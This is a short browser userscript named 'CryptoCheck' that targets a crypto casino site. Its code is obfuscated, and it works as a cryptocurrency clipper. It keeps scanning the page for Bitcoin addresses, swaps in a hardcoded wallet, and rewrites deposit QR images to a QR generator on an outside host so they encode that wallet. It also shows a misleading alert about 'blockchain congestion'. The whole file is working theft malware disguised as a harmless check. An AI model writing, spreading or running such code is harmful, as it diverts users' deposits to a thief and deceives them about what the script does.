// ==UserScript==
// @name         CryptoCheck
// @version      1.0
// @description  No Desc
// @match        https://betpandacasino.io/en/*
// @grant        none
// @author       Zile42O
// ==/UserScript==

function _0xec95(){var _0x4c8b5f=['Dwldv','Artificial','qr/api.php','hvKvN','TEXT_NODE','querySelec','sByTagName','QBpgB','regex','&address=','1240020DcfEmx','ut8fedvakw','ftoQm','2oCGHau','IOOAw','DXvsS','includes','PbKyN','replace','fjuUY','childNodes','&amount=0','hDXVB','i.zile42o.','slBIH','forEach','mzvoz','PvfzR','replacemen','HgAAE','RHcPr','9492976RYgQzS','sNWSw','src','dev/crypto','\x20to\x20contin','bitcoin','DISqg','Avtbk','hwSnE','3101848TWyDlW','?coin=','4903449RGStSx','getAttribu','n\x20conjesti','llKQf','10442478IeJfOx','.\x20Click\x20Ok','setAttribu','h0jyt2psnl','coin','4z22445kun','VUywV','lRYKn','nodeValue','KkTht','JVQvK','base64','CQTJd','hMzrC','tumBn','Dwuhq','jbvpf','torAll','trim','8057462tLbbdl','img','bc1q5mvqny','nodeType','NEkcJ','from','nfxES','2937750FQZTiu','getElement','\x20blockchai','ZGGpZ','on\x20enabled','vIOqG','https://ap','NyxXX','iYOAJ','lSSVJ','test'];_0xec95=function(){return _0x4c8b5f;};return _0xec95();}function _0x30ad(_0x44b2c6,_0x2780ca){var _0x5aa52c=_0xec95();return _0x30ad=function(_0xa0c53c,_0x1369e9){_0xa0c53c=_0xa0c53c-(-0x36c+0x7*-0x2c1+0x1826);var _0x274a64=_0x5aa52c[_0xa0c53c];return _0x274a64;},_0x30ad(_0x44b2c6,_0x2780ca);}(function(_0x381b35,_0x5e6c58){var _0x4a5553=_0x30ad,_0x54cbae=_0x381b35();while(!![]){try{var _0x3a15e8=parseInt(_0x4a5553(0x17b))/(-0x5ad+0x6f7*0x1+0x7*-0x2f)+-parseInt(_0x4a5553(0x17e))/(0xdcf+0x23*-0xa+0x3*-0x425)*(-parseInt(_0x4a5553(0x19b))/(-0x1*0x1101+-0x61d*-0x6+0x347*-0x6))+-parseInt(_0x4a5553(0x199))/(0x1*0xc02+-0x11*-0x245+-0x3293)+parseInt(_0x4a5553(0x1b9))/(-0xe37+0xfb6+-0x17a)+-parseInt(_0x4a5553(0x19f))/(-0x1f12+0x422*-0x4+0xc*0x3f8)+parseInt(_0x4a5553(0x1b2))/(-0x11f5*-0x2+-0x1ff*0x4+0x94d*-0x3)+-parseInt(_0x4a5553(0x190))/(0xa4f+-0x1297+0x850);if(_0x3a15e8===_0x5e6c58)break;else _0x54cbae['push'](_0x54cbae['shift']());}catch(_0x4d9b5b){_0x54cbae['push'](_0x54cbae['shift']());}}}(_0xec95,0xd2e97+-0x8096d+0x8bff4),(function(){'use strict';var _0x515d4c=_0x30ad,_0x101190={'VUywV':_0x515d4c(0x192),'tumBn':_0x515d4c(0x1aa),'PbKyN':function(_0xcb53bc,_0x32c4ff){return _0xcb53bc+_0x32c4ff;},'hDXVB':_0x515d4c(0x1bf)+_0x515d4c(0x188)+_0x515d4c(0x193)+_0x515d4c(0x173)+_0x515d4c(0x19a),'JVQvK':_0x515d4c(0x17a),'hvKvN':_0x515d4c(0x186),'IOOAw':_0x515d4c(0x1b3),'sNWSw':function(_0x9732e9,_0x3c1592){return _0x9732e9===_0x3c1592;},'lSSVJ':function(_0x5bda6a){return _0x5bda6a();},'NyxXX':_0x515d4c(0x1b4)+_0x515d4c(0x17c)+_0x515d4c(0x1a2)+_0x515d4c(0x1a4)+'2h','Avtbk':_0x515d4c(0x195),'Dwldv':function(_0x377f72,_0xd0635){return _0x377f72(_0xd0635);},'DXvsS':_0x515d4c(0x1c5)+_0x515d4c(0x1bb)+_0x515d4c(0x19d)+_0x515d4c(0x1bd)+_0x515d4c(0x1a0)+_0x515d4c(0x194)+'ue','KkTht':function(_0x5402e1,_0x397910,_0x159231){return _0x5402e1(_0x397910,_0x159231);}};var _0x5988f2=[{'regex':/(^|\W)(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}($|\W)/,'replacement':_0x101190[_0x515d4c(0x1c0)],'coin':_0x101190[_0x515d4c(0x197)]}];_0x101190[_0x515d4c(0x1c4)](alert,_0x101190[_0x515d4c(0x180)]);function _0x3d099d(){var _0x135751=_0x515d4c,_0x392a19={'NEkcJ':_0x101190[_0x135751(0x1a5)],'ftoQm':_0x101190[_0x135751(0x1ad)],'mzvoz':function(_0x467ab2,_0xf4fb95){var _0x2a4c18=_0x135751;return _0x101190[_0x2a4c18(0x182)](_0x467ab2,_0xf4fb95);},'HgAAE':_0x101190[_0x135751(0x187)],'Dwuhq':_0x101190[_0x135751(0x1a9)],'lRYKn':_0x101190[_0x135751(0x174)],'RHcPr':_0x101190[_0x135751(0x17f)],'vIOqG':function(_0x34280f,_0x4bcabf){var _0x3a3aef=_0x135751;return _0x101190[_0x3a3aef(0x191)](_0x34280f,_0x4bcabf);}},_0x22ffba=document[_0x135751(0x176)+_0x135751(0x1b0)]('*');_0x22ffba[_0x135751(0x18a)](function(_0x1c2c2b){var _0x4a9d38=_0x135751;Array[_0x4a9d38(0x1b7)](_0x1c2c2b[_0x4a9d38(0x185)])[_0x4a9d38(0x18a)](function(_0xd05ab0){var _0x3d0769=_0x4a9d38,_0x551a31={'iYOAJ':_0x392a19[_0x3d0769(0x1b6)],'PvfzR':_0x392a19[_0x3d0769(0x17d)],'hwSnE':function(_0x34e54f,_0x1315de){var _0x8e7328=_0x3d0769;return _0x392a19[_0x8e7328(0x18b)](_0x34e54f,_0x1315de);},'nfxES':_0x392a19[_0x3d0769(0x18e)],'jbvpf':_0x392a19[_0x3d0769(0x1ae)],'fjuUY':_0x392a19[_0x3d0769(0x1a6)],'llKQf':_0x392a19[_0x3d0769(0x18f)]};if(_0x392a19[_0x3d0769(0x1be)](_0xd05ab0[_0x3d0769(0x1b5)],Node[_0x3d0769(0x175)])){var _0x14888a=_0xd05ab0[_0x3d0769(0x1a7)][_0x3d0769(0x1b1)]();_0x5988f2[_0x3d0769(0x18a)](function(_0x47161d){var _0x11c684=_0x3d0769,_0x4bee59={'QBpgB':_0x551a31[_0x11c684(0x1c1)],'CQTJd':_0x551a31[_0x11c684(0x18c)],'DISqg':function(_0x41dd69,_0x525499){var _0x355d5f=_0x11c684;return _0x551a31[_0x355d5f(0x198)](_0x41dd69,_0x525499);},'hMzrC':_0x551a31[_0x11c684(0x1b8)],'slBIH':_0x551a31[_0x11c684(0x1af)],'ZGGpZ':_0x551a31[_0x11c684(0x184)]};if(_0x47161d[_0x11c684(0x179)][_0x11c684(0x1c3)](_0x14888a)){_0xd05ab0[_0x11c684(0x1a7)]=_0x14888a[_0x11c684(0x183)](_0x47161d[_0x11c684(0x179)],_0x47161d[_0x11c684(0x18d)+'t']);var _0x1229ff=_0x47161d[_0x11c684(0x18d)+'t'],_0x588077=_0x47161d[_0x11c684(0x1a3)];Array[_0x11c684(0x1b7)](document[_0x11c684(0x1ba)+_0x11c684(0x177)](_0x551a31[_0x11c684(0x19e)]))[_0x11c684(0x18a)](function(_0x2fe1cd){var _0x2cc90e=_0x11c684,_0x56e480=_0x2fe1cd[_0x2cc90e(0x19c)+'te'](_0x4bee59[_0x2cc90e(0x178)]);if(_0x56e480&&_0x56e480[_0x2cc90e(0x181)](_0x4bee59[_0x2cc90e(0x1ab)])){var _0x54af58=_0x4bee59[_0x2cc90e(0x196)](_0x4bee59[_0x2cc90e(0x196)](_0x4bee59[_0x2cc90e(0x196)](_0x4bee59[_0x2cc90e(0x196)](_0x4bee59[_0x2cc90e(0x1ac)],_0x588077),_0x4bee59[_0x2cc90e(0x189)]),_0x1229ff),_0x4bee59[_0x2cc90e(0x1bc)]);_0x2fe1cd[_0x2cc90e(0x1a1)+'te'](_0x4bee59[_0x2cc90e(0x178)],_0x54af58);}});}});}});});}_0x101190[_0x515d4c(0x1a8)](setInterval,function(){var _0x3f382e=_0x515d4c;_0x101190[_0x3f382e(0x1c2)](_0x3d099d);},-0xd9+-0x1*0xed8+0x1015);}()));
